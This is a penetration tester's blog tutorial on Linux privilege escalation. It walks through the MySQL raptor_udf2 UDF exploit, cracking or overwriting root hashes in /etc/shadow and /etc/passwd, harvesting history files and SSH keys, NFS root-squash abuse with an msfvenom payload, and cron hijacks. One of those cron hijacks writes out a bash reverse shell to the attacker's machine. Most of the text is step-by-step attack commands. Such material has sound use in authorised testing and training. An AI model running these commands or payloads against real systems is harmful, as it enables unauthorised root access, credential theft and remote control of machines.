Terence Fürst

Penetration Tester

Linux Privilege Escalation

Overview of the different Linux Privilege Escalation chapters in this article

MySQL 4.x/5.0 (Linux) – User-Defined Function (UDF)

Let’s start this Article with an „Oldie but Goldy Linux Privilege Escalation“.

If the MySQL service is running as root and the „root“ user for the service does not have a password assigned. We can use a popular exploit that takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service.

* Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 * mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
 * /tmp/rootbash -p

Weak File Permissions – Readable /etc/shadow

In the etc/shadow every line is representing a user. A user’s password hash if the have one, can be found between the first and second colon of each line.

root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::

We can try to crack the hash with john the ripper, to do this save the hash i a file called root-hash.txt.

After this start the crack process with the command

john --wordlist=/usr/share/wordlist/rockyou.txt root-hash.txt

To login with the the root user you can use the command su root.

Weak File Permissions – Writeable /etc/shadow

If we find that the /etc/shadow is writeable as non-root User than we can crate a new hash with the command

mkpasswd -m sha-512 <newpassword>

Now copy the generated hash over the existing root hash and login with the command su root and your password.

Weak File Permissions – Writeable /etc/passwd

The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.

Generate a new password hash with a password of your choice

openssl passwd <newpassword>

Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user’s row (replacing the „x“).

Sudo – Shell Escape Sequences

With the command

sudo -l

Visit GTFOBins (https://gtfobins.github.io) and for the program names. If the program is listed with „sudo“ as a function, you can use it to elevate privileges, usually via an escape sequence.

Sudo – Environment Variables

Sudo can be configured to inherit certain environment variables from the user’s environment.

Check which environment variables are inherited (look for the env_keep options):

sudo -l

LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user’s environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

Password & Keys – Config Files

Config files often contain passwords in plaintext or other reversible formats.

Password & Keys – History Files

If a user accidentally types their password on the command line instead of into a password prompt, it may get recorded in a history file.

View the contents of all the hidden history files in the user’s home directory with the following command

cat ~/.*history | less

Password & Keys – SSH Keys

Sometimes users make backups of important files but fail to secure them with the correct permissions.

We will look for hidden files & directories in the system root with the following command

ls -la /

If you are lucky to find a private ssh key, copy this over to your machine and give it the right permissions to work

chmod 600 ssh_key

To use the key now for the login process use the following command

ssh -i ssh_key root#<ip>

NFS

Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the „nobody“ user.

Check the NFS share configuration on victim Machine

cat /etc/exports

If you find a share that has root squashing disabled, then elevate your permissions to root with su root on your machine. Now create a mount point and mount the NFS Share with the following command

mkdir /mnt/nfs

mount -o rw,vers=2 <ip>:/<disabled root squashing share> /mnt/nfs

Still on your own machine, generate a payload using msfvenom and save it to the mounted share (this payload simply calls /bin/bash)

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /mnt/nfs/shell.elf

Also on your own machine make the file executable and set the SUID permission

chmod +xs /mnt/nfs/shell.elf

Now switch back to the victim machine as the low privileged user account, execute the file with /<disabled root squashing share>/shell.elf and you get a root shell presented.

Kernel Exploits

Kernel exploits can leave the system in an unstable state, which is why you should only run them as a last resort.

To identify this kind vulnerability you can use the popular Linux Exploit Suggester 2.

Cron Jobs – File Permissions

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab. You can view the content with the command

cat /etc/crontab

Check the permission on all cron jobs that are included, if you find a file that word-writeable is you can replace this with a bash reverse shell pointing to your machine.

#!/bin/bash
bash -i >& /dev/tcp/<your ip>/4444 0>&1

Set up a netcat listener on your Kali box on port 4444 and wait for the cron job to run (should not take longer than a minute). A root shell should connect back to your netcat listener which you can set up with the command nc -nvlp 4444.

Cron Jobs – PATH Environment Variable

If you find a cronjob without the absolut path in the cron jobs you can abuse the PATH Environment Variable.

cat /etc/crontab

Note that the PATH variable starts with /home/user which is our user’s home directory.

Create a file called <name of the cronjob file>.sh in your home directory with the following contents (Important to set the execute and SUID bit):

#!/bin/bash

cp /bin/bash /tmp/bash
chmod +xs /tmp/bash

Make sure that the file is executable:

chmod +x /home/user/<name of the cronjob file>.sh

Wait for the cron job to run. Run the /tmp/bash command with -p to gain a shell running with root privileges:

/tmp/bash -p

Cron Jobs – Wildcards

If you find in the cronjobs a task that is calling tar with a wildcard like this tar czf /tmp/backup.tar.gz * – for this exists a entry on GTFOBins – it can be used to run other commands like a reverse shell.

SUID / SGID Executables – Known Exploits

To find all the SUID/SGID executables on the victim Machine run the following command

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null

Tags :
Previous Article
Next Article